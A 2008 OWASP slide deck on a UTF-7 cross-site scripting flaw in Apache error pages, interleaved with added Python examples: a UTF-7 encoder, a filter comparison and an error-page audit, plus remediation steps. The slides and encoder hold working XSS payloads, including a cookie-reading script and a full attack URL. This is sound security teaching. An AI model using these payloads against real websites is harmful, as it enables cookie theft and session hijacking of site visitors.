
Slide 1: UTF7 XSS - Apache and Others
Copyright © The OWASP Foundation. Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation, http://www.owasp.org
Yaniv Miron aka "Lament", YanivM@ComsecGlobal.com
Israel, 2008 September 14

Slide 2: Disclaimers
- This information is for learning purposes only.
- Do NOT attack the site example.com.
- The pictures in this presentation were freely available on the net, as far as I know.

Slide 3: General
- New vulnerability.
- Attacks any Apache web server (May 2008).
- Found in April 2008 by Yaniv Miron and Yossi Yakobov and published in May 2008.

Slide 4: Cross Site Scripting aka "XSS"
- What is XSS?
  A security vulnerability, typically found in web applications, that lets a malicious user inject script into pages served to other users.
- Examples:
  [URL] <script>alert(31337)</script>
  [URL] <script>alert(document.cookie)</script>

Slide 5: UTF7 Character Encoding
- What is UTF7?
  One of the many character encodings available. In UTF-7 the characters '<' and '>' can be written as the base64 shift sequences +ADw- and +AD4-, so a script tag needs none of the characters an HTML escaper looks for.
- Examples (plain, then UTF-7 encoded):
  <script>alert(31337)</script>
  +ADw-script+AD4-alert(31337)+ADw-/script+AD4-
  <script>alert(document.cookie)</script>
  +ADw-script+AD4-alert(document.cookie)+ADw-/script+AD4-
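The encoding step this slide shows, as an added example that is not part of the original presentation: a small strict UTF-7 encoder that base64-shifts '<' and '>' the way the payloads above do, the standard-library decoder to reverse it, and a naive "<script" filter beside the decode-then-filter check that catches the shifted form. The function names and the toy filter are this example's own, not from the talk; the standard library is used for decoding only, because Python's own UTF-7 encoder writes '<' and '>' directly rather than as +ADw- and +AD4-.

```python
import base64

# RFC 2152 "Set D" plus whitespace: characters written directly. Everything
# else is base64-shifted below. That is stricter than the RFC requires
# ('<' and '>' are optional-direct) but it is exactly what turns <script>
# into +ADw-script+AD4- as on the slides.
DIRECT = set(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
    "'(),-./:? \t\r\n"
)


def utf7_encode(text: str) -> str:
    """Encode text as UTF-7, shifting every run of non-DIRECT characters.

    A run becomes '+' + base64(UTF-16BE bytes) + '-' with the '=' padding
    removed; a literal '+' uses the '+-' shortcut from the RFC.
    """
    out = []
    run = []

    def flush() -> None:
        if run:
            raw = "".join(run).encode("utf-16-be")
            b64 = base64.b64encode(raw).decode("ascii").rstrip("=")
            out.append("+" + b64 + "-")
            run.clear()

    for ch in text:
        if ch in DIRECT:
            flush()
            out.append(ch)
        elif ch == "+":
            flush()
            out.append("+-")
        else:
            run.append(ch)
    flush()
    return "".join(out)


def utf7_decode(data: str) -> str:
    """Decode with the standard-library codec, which handles the shifted form
    correctly (only the stdlib encoder avoids producing it). UTF-7 is pure
    ASCII, so non-ASCII input is rejected rather than guessed at."""
    return data.encode("ascii").decode("utf-7")


def naive_filter_blocks(user_input: str) -> bool:
    """A byte-level filter of the kind the slides' payload walks past:
    it only ever sees the literal characters it was handed."""
    return "<script" in user_input.lower()


def decode_then_filter_blocks(user_input: str) -> bool:
    """The 'check encoding' step: normalise first, then run the same filter."""
    try:
        decoded = utf7_decode(user_input)
    except (UnicodeEncodeError, UnicodeDecodeError):
        # Not valid UTF-7 at all: fall back to the literal form.
        decoded = user_input
    return naive_filter_blocks(decoded)


if __name__ == "__main__":
    for payload in ("<script>alert(31337)</script>",
                    "<script>alert(document.cookie)</script>"):
        enc = utf7_encode(payload)
        print(payload, "->", enc)
        print("  naive filter blocks encoded form: ", naive_filter_blocks(enc))
        print("  decode-then-filter blocks it:     ", decode_then_filter_blocks(enc))
```

Running it reproduces both strings from the slide. The point of the last two functions is the order of operations: a filter that matches on the raw request text never sees a '<', while the same filter run after decoding does.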

Slide 6: Apache Web Server
- What is Apache?
  Well, come on...

Slide 7: The Vulnerability
- A bit complicated.
- Not fully automatic.
- Infrastructure & application attack.
- All Apache versions are vulnerable (May 2008).

Slide 8: Vulnerability Parts
- Built from:
  - A web site that uses the Apache web server.
  - HTML injection.
  - A UTF-7 XSS string.
- How the parts fit together: the UTF-7 form carries '<' and '>' as +ADw- and +AD4-, so it survives output escaping intact; when the page that reflects it declares no character set, a browser that auto-detects encodings can read the response as UTF-7 and render the sequence as <script>.

Slide 9: The String
- Who knows what is behind this string? What kind of encoding/encryption does it contain?
  Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ

Slide 10: Example
  http://www.example.com/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ+ADw-script+AD4-alert('UTF7 XSS Attack')+ADw-/script+AD4-

Slide 11: Example - 2nd part

Slide 12: Future Development
- Fully automatic attack.

Slide 13: Responses
- Security Focus
- Apache
- Microsoft
- HP

Slide 14: How to Fix
- Check:
  - Encoding: declare the response character set explicitly so the browser has nothing to auto-detect.
  - Inputs: validate after decoding, not on the raw bytes.
  - Use non-default 403/404 and other error pages, so the requested URL is not reflected back.
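The checks on this slide turned into a test a practitioner can run against a captured response, as an added example that is not from the presentation: the function reports whether an error page echoes the request path and whether it declares a character set, the two conditions the attack on slides 8 to 10 needs together. The sample responses are constructed to match the behaviour the slides describe (a default error page that echoes the path) and were not captured from a real server; the long random prefix from slide 9 is shortened, and all names here are the example's own.

```python
import re

# Constructed stand-in for the slide 10 URL (random prefix shortened).
PAYLOAD_PATH = "/Znl5g3k70ZaBUPYmN5RAGUdks+ADw-script+AD4-alert('UTF7 XSS Attack')+ADw-/script+AD4-"

# Constructed: no charset, and the request path is echoed verbatim.
WEAK_403 = (
    b"HTTP/1.1 403 Forbidden\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html><head><title>403 Forbidden</title></head><body>"
    b"<h1>Forbidden</h1><p>You don't have permission to access "
    + PAYLOAD_PATH.encode("ascii") +
    b" on this server.</p></body></html>"
)

# Constructed: charset declared in the header and in <meta>, path not echoed.
FIXED_403 = (
    b"HTTP/1.1 403 Forbidden\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"\r\n"
    b"<html><head><meta charset=\"UTF-8\"><title>403 Forbidden</title></head>"
    b"<body><h1>Forbidden</h1><p>Access to the requested resource is denied."
    b"</p></body></html>"
)

# Constructed: still echoes the path, but the charset is declared.
HALF_FIXED_403 = WEAK_403.replace(
    b"Content-Type: text/html\r\n", b"Content-Type: text/html; charset=UTF-8\r\n"
)

CHARSET_IN_HEADER = re.compile(r"charset\s*=\s*\"?([\w.:-]+)", re.I)
CHARSET_IN_META = re.compile(rb"<meta[^>]*charset\s*=\s*[\"']?([\w.:-]+)", re.I)
# A UTF-7 shift sequence: '+', base64 characters, closing '-'.
UTF7_SHIFT = re.compile(rb"\+[A-Za-z0-9+/]{2,}-")


def parse_response(raw: bytes):
    """Split a raw HTTP/1.x response into (status_line, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def audit_error_page(raw: bytes, request_path: str) -> dict:
    """Report the conditions that make the slides' attack work.

    exploitable = the request path is echoed verbatim (so +ADw- survives
    HTML escaping) AND no charset is declared, leaving a browser free to
    auto-detect UTF-7. A declared charset alone defeats the UTF-7 trick;
    the reflection is still reported because it is the HTML-injection half.
    """
    status_line, headers, body = parse_response(raw)
    declared = bool(CHARSET_IN_HEADER.search(headers.get("content-type", ""))
                    or CHARSET_IN_META.search(body))
    reflected = request_path.encode("ascii", "replace") in body
    parts = status_line.split()
    report = {
        "status": parts[1] if len(parts) > 1 else "",
        "charset_declared": declared,
        "path_reflected": reflected,
        "utf7_shift_in_body": UTF7_SHIFT.search(body) is not None,
    }
    report["exploitable"] = reflected and not declared
    return report


if __name__ == "__main__":
    for name, raw in (("default-style page", WEAK_403),
                      ("charset only", HALF_FIXED_403),
                      ("fixed page", FIXED_403)):
        print(name, audit_error_page(raw, PAYLOAD_PATH))
```

The directive-level equivalents in httpd.conf are `ErrorDocument 403 /errors/403.html` for a non-default error page and `AddDefaultCharset UTF-8` to declare the charset. With the charset declared, a browser has no reason to sniff UTF-7, so +ADw- stays harmless text even if something still reflects it; the "charset only" sample shows the check reporting exactly that.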

Slide 15: References
- Security Focus
  - BID: http://www.securityfocus.com/bid/29112
  - Exploit example: http://downloads.securityfocus.com/vulnerabilities/exploits/29112.html
- HP
  - http://alerts.hp.com/r?2.1.3KT.2ZR.xg7ek.CTm6em..T.EpPS.1Zqm.KdCEfL00
- Just Google my name "Yaniv Miron" =]

Slide 16: [-] EOF [-]
- Thank you for listening!
- Yaniv Miron aka "Lament" - Comsec Consulting, YanivM@ComsecGlobal.com
- Yossi Yakobov - Comsec Consulting, YossiY@ComsecGlobal.com

